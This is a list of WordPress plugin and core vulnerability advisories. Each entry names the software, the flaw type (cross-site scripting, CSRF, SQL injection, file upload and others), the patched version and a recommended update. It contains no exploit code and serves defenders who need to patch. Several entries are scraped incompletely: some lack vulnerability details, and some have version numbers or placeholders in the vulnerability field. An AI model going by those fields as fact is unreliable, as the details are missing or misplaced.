Vulnerability: Cross-Site Request Forgery via apbct_settings__update_account_email
Patched Version: 6.21
Recommended Action: Update to version 6.21, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Subscriber+ Arbitrary Post Deletion and Plugin Settings Update
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Malicious SVG
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘uucss_update_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Contact Form for WordPress – Ultimate Form Builder Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Local File Inclusion
Patched Version: 2.1.2.1
Recommended Action: Update to version 2.1.2.1, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: All In One Favicon

Vulnerability: Authenticated(Admin+) Directory Traversal
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: SMTP Mailing Queue

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Vertical scroll recent post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Unauthenticated SQL Injection via user_id
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Safe SVG

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Directory Traversal
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: BuddyPress

Vulnerability: 1.5-1.5.4
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.7.26.4
Recommended Action: Update to version 5.7.26.4, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Injection Guard

Vulnerability: Cross-Site Request Forgery to Whitelist Update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Five Minute Webshop

Vulnerability: Authenticated (Admin+) SQL Injection via id
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Nested Pages

Vulnerability: Missing Authorization
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Easy SVG Allow

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Activation Email

Plugin: SEO by 10Web

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via mf shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: PayGreen – Ancienne version

Plugin: Clean Login

Vulnerability: Cross-Site Scripting
Patched Version: 1.12.6.4
Recommended Action: Update to version 1.12.6.4, or a newer patched version

Plugin: WP Open Street Map

Vulnerability: Cross-Site Request Forgery via wp_openstreetmaps
Patched Version: 1.30
Recommended Action: Update to version 1.30, or a newer patched version

Plugin: Restaurant Reservations

Vulnerability: Options Change
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Ready! Ecommerce Shopping Cart

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Event Registration Calendar By vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: miwoftp

Vulnerability: Cross-Site Request Forgery to Arbitrary File Deletion
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Core: WordPress

Vulnerability: Same Origin Policy Bypass
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Custom Twitter Feeds – A Tweets Widget or X Feed Widget

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Toggle The Title

Plugin: WordPress Exit Box Lite

Vulnerability: Full Path Dislcosure
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Core: WordPress

Vulnerability: XML External Entity (XXE) Weakness
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Site Reviews

Vulnerability: Missing Authorization
Patched Version: 6.10.3
Recommended Action: Update to version 6.10.3, or a newer patched version

Plugin: FAQs Manager

Plugin: Layer Slider

Vulnerability: Cross-Site Request Forgery via save_slide_ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Plugin Mobile App Native 3.0

Plugin: Add Any Extension to Pages

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: SAML Single Sign On – SSO Login Standard

Vulnerability: Open Redirect
Patched Version: 16.0.8
Recommended Action: Update to version 16.0.8, or a newer patched version

Plugin: Drag and Drop Multiple File Upload PRO – Contact Form 7 Standard

Vulnerability: Directory Traversal
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: MPL-Publisher — Ebook & Audiobook Creator

Vulnerability: Various Plugins (Various Versions)
Patched Version: 1.29.2
Recommended Action: Update to version 1.29.2, or a newer patched version

Plugin: Button Builder – Buttons X

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Product Limit Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: kk Star Ratings – Rate Post & Collect User Feedbacks

Vulnerability: Missing Authorization
Patched Version: 5.4.6
Recommended Action: Update to version 5.4.6, or a newer patched version

Plugin: Easy Form Builder

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.5.7.1
Recommended Action: Update to version 2.5.7.1, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Cross-Site Scripting
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: BestWebSoft's Twitter

Vulnerability: Cross-Site Scripting
Patched Version: 2.55
Recommended Action: Update to version 2.55, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.19
Recommended Action: Update to version 1.15.19, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder

Vulnerability: Authenticated(Contributor+) Privilege Escalation
Patched Version: 1.35.15
Recommended Action: Update to version 1.35.15, or a newer patched version

Plugin: Amazon Einzeltitellinks

Vulnerability: Cross-Site Request Forgery to Arbitrary Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Alpine Photo Tile for Instagram

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WhitePage

Vulnerability: Cross-Site Request Forgery via params_api_form.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Lightweight Accordion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.15
Recommended Action: Update to version 1.5.15, or a newer patched version

Plugin: WPO365 | Mail Integration for Office 365 / Outlook

Vulnerability: reflected Cross-Site Scripting via error_description
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Contact Form 7 <= 1.3.7.3
Patched Version: 1.3.7.4
Recommended Action: Update to version 1.3.7.4, or a newer patched version

Plugin: Ultimate SMS Notifications for WooCommerce

Vulnerability: CSV Injection
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Import Cross-Site Scripting
Patched Version: 1.12.1
Recommended Action: Update to version 1.12.1, or a newer patched version

Plugin: BERTHA AI. Your AI co-pilot for WordPress and Chrome

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.11.10.8
Recommended Action: Update to version 1.11.10.8, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Information Disclosure
Patched Version: 2.0.8
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.8, 2.1.6, 2.2.9, 2.3.9, 2.4.6, 2.5.4, 2.6.5, 2.7.4, 2.8.4, 2.9.5, 3.0.5, 3.1.4, 3.2.4, 3.3.5, 3.4.5, 3.5.5, 3.6.3, 3.7.4, 3.8.4, 3.9.8, 4.0.5, 4.1.2, 4.2.3, 4.3.3, 4.4.3, 4.5.1, 4.6.1, 4.7.2, 4.8.3, 4.9.1, 5.0.1, 5.1.2, 5.2.3, 5.3.2, 5.4.2, 5.5.3, 5.6.3, 5.7.3, 5.8.2, 5.9.2, 6.0.2, 6.1.3, 6.2.3, 6.3.5, 6.4.4, 6.5.2, 6.6.3, 6.7.2, 6.8.3, 6.9.2, 7.0.3, 7.1.3, 7.2.3, 7.3.3, 7.4.3, 7.5.5, 7.6.2, 7.7.4, 7.8.2, 7.9.2, 8.0.1, 8.1.2, 8.2.4, 8.3.1, 8.4.3, 8.5.1, 8.6.2, 8.7.2, 8.8.3, 8.9.2, 9.0.3, 9.1.1, 9.2.2, 9.3.3, 9.4.2, 9.5.3, 9.6.2, 9.7.1

Plugin: twitterDash

Plugin: Review Stream

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Missing Authorization to Arbitrary Post Deletion
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Scripting
Patched Version: 0.4.5
Recommended Action: Update to version 0.4.5, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.4.2
Recommended Action: Update to version 3.0.4.2, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Instant Images – One-click Image Uploads from Unsplash, Openverse, Pixabay, Pexels, and Giphy

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.4.0.1
Recommended Action: Update to version 4.4.0.1, or a newer patched version

Plugin: Void Elementor Post Grid Addon for Elementor Page builder

Vulnerability: Missing Authorization to Review Notice Dismissal
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Firelight Lightbox

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.18
Recommended Action: Update to version 1.8.18, or a newer patched version

Plugin: All in One SEO Pro – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Admin+) Server Side Request Forgery
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: Contact Form X

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Swift SMTP (formerly Welcome Email Editor)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Authenticated Feedback Submission
Patched Version: 1.3.35
Recommended Action: Update to version 1.3.35, or a newer patched version

Plugin: GB Team Stats

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Document Embedder – Document Embedder Plugin

Vulnerability: Subscriber+ Arbitrary Private/Draft Post Title Disclosure
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Media File Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 4.6.9
Recommended Action: Update to version 4.6.9, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘attach_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Core: WordPress

Plugin: hybrid-composer

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: CBI Referral Manager

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Elegant Testimonial

Plugin: English WordPress Admin

Vulnerability: Unauthenticated Open Redirect
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Missing Access Controls
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Authorization Bypass due to Improper Access Control
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.8.7
Recommended Action: Update to version 6.8.7, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Authenticated Settings Reset via reset-cmb Parameter
Patched Version: 1.0.27.1
Recommended Action: Update to version 1.0.27.1, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2.3
Recommended Action: Update to version 2.7.2.3, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2021.18
Recommended Action: Update to version 2021.18, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Missing Authorization via handle_installation
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 4.0.11
Recommended Action: Update to version 4.0.11, or a newer patched version

Plugin: wp-publications

Vulnerability: Local File Inclusion
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP Product Review Lite

Vulnerability: Unauthenticated Stored Cross Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: WooCommerce Cart & Floating Cart

Vulnerability: Missing Authorization
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: SMSmaster – Multipurpose SMS Gateway for WordPress

Plugin: Insert or Embed Articulate Content into WordPress

Vulnerability: Directory Traversal
Patched Version: 4.29991
Recommended Action: Update to version 4.29991, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘deleteRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Request Forgery to Settings Modification
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Smash Balloon Social Photo Feed – Easy Social Feeds Plugin

Vulnerability: Cross-Site Request Forgery to Back-Up Deletion
Patched Version: 1.12
Recommended Action: Update to version 1.12, or a newer patched version

Plugin: Contact Form by Supsystic

Vulnerability: Cross-Site Request Forgery via AJAX action
Patched Version: 1.7.25
Recommended Action: Update to version 1.7.25, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: WordPress Responsive Pricing Tables <= 3.3.19
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 10.0.2
Recommended Action: Update to version 10.0.2, or a newer patched version

Plugin: kk Star Ratings – Rate Post & Collect User Feedbacks

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 5.4.4
Recommended Action: Update to version 5.4.4, or a newer patched version

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Missing Authorization
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: HDW WordPress Video Gallery

Vulnerability: Reflected Cross-Site Scripting via channel parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Slider Feed

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Myflash

Vulnerability: Remote File Inclusion
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Sensitive Information Exposure
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: CF7 Google Sheets Connector Pro

Vulnerability: Reflected Cross-Site Scripting via ‘code’
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Account Creation
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: 4.2.12
Patched Version: 4.2.153
Recommended Action: Update to version 4.2.153, or a newer patched version

Plugin: WP Forms Puzzle Captcha

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthorized Account Access and Privilege Escalation
Patched Version: 4.10.8
Recommended Action: Update to version 4.10.8, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_preload_single_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: JetSearch

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.2.1
Recommended Action: Update to version 3.1.2.1, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Location Weather – Hourly, Daily Weather Forecast Widget and Weather Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 2.7.26
Recommended Action: Update to version 2.7.26, or a newer patched version

Plugin: Olevmedia Shortcodes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Missing Authorization
Patched Version: 1.3.70
Recommended Action: Update to version 1.3.70, or a newer patched version

Plugin: WP Google Tag Manager

Plugin: Email Artillery (MASS EMAIL)

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting in FAQ Builder
Patched Version: 4.7.8
Recommended Action: Update to version 4.7.8, or a newer patched version

Plugin: Restricted Site Access

Vulnerability: Sandbox Bypass
Patched Version: 7.4.0
Recommended Action: Update to version 7.4.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.16.2
Recommended Action: Update to version 5.16.2, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 4.5.91
Recommended Action: Update to version 4.5.91, or a newer patched version

Plugin: Cool Timeline (Horizontal & Vertical Timeline)

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Contact Us Page – Contact People

Vulnerability: Cross Site Request Forgery
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Yoast Duplicate Post

Vulnerability: SQL Injection
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.9.11
Recommended Action: Update to version 3.9.11, or a newer patched version

Plugin: Booking Calendar – Clockwork SMS

Vulnerability: Clockwork SMS <= 1.0.5
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WPMK Ajax Finder

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 8.3.1
Recommended Action: Update to version 8.3.1, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated Remote Code Execution
Patched Version: 2.4.22
Recommended Action: Update to version 2.4.22, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Reflected Cross-Site Scripting via ‘question’
Patched Version: 3.3.9.3
Recommended Action: Update to version 3.3.9.3, or a newer patched version

Plugin: Awesome Weather Widget

Vulnerability: Reflected Cross-site Scripting via id Parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iframe popup

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Time-Based TOTP attack to Sensitive Information Exposure
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.1.2
Recommended Action: Update to version 1.5.1.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 7.3.11 Sensitive Information Disclosure
Patched Version: 7.3.12
Recommended Action: Update to version 7.3.12, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.46
Recommended Action: Update to version 1.1.46, or a newer patched version

Plugin: WooCommerce Composite Products

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.7.6
Recommended Action: Update to version 8.7.6, or a newer patched version

Plugin: Accredible Certificates & Open Badges

Plugin: Cart All In One For WooCommerce

Vulnerability: Cross-Site Request Forgery to Cart Changes
Patched Version: 1.1.11
Recommended Action: Update to version 1.1.11, or a newer patched version

Plugin: MapGeo – Interactive Geo Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: WordPress Easy Custom Js And Css Plugin

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Missing Authorization via REST API
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Easy EU Value Added (VAT) Taxes Add-on

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: S3 Video Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 0.98
Recommended Action: Update to version 0.98, or a newer patched version

Plugin: Attendance Manager

Vulnerability: Cross-site Request Forgery
Patched Version: 0.5.7
Recommended Action: Update to version 0.5.7, or a newer patched version

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: SQL Injection
Patched Version: 3.2.6.8
Recommended Action: Update to version 3.2.6.8, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via button_text_link parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: 2kb Amazon Affiliates Store

Plugin: Wonder PDF Embed

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Plugin: WP Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Plugin: VK All in One Expansion Unit

Vulnerability: Stored (Contributor+) Cross-Site Scripting in CTA Post
Patched Version: 9.88.2.0
Recommended Action: Update to version 9.88.2.0, or a newer patched version

Plugin: Team Showcase

Vulnerability: Object Injection
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: Easy Accordion – Responsive Accordion FAQ Builder and Product FAQ

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via ‘category_name’, ‘description’, ‘description_2’ parameters
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: SiteOrigin Widgets Bundle

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.51.0
Recommended Action: Update to version 1.51.0, or a newer patched version

Plugin: Email Tracker – Email Tracking Plugin to track Emails for Open and Email Links Click (Compatible with WooCommerce)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: 3.3.0
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: NAB Transact

Vulnerability: Payment System Bypass
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Search Everything

Vulnerability: SQL Injection
Patched Version: 7.0.3
Recommended Action: Update to version 7.0.3, or a newer patched version

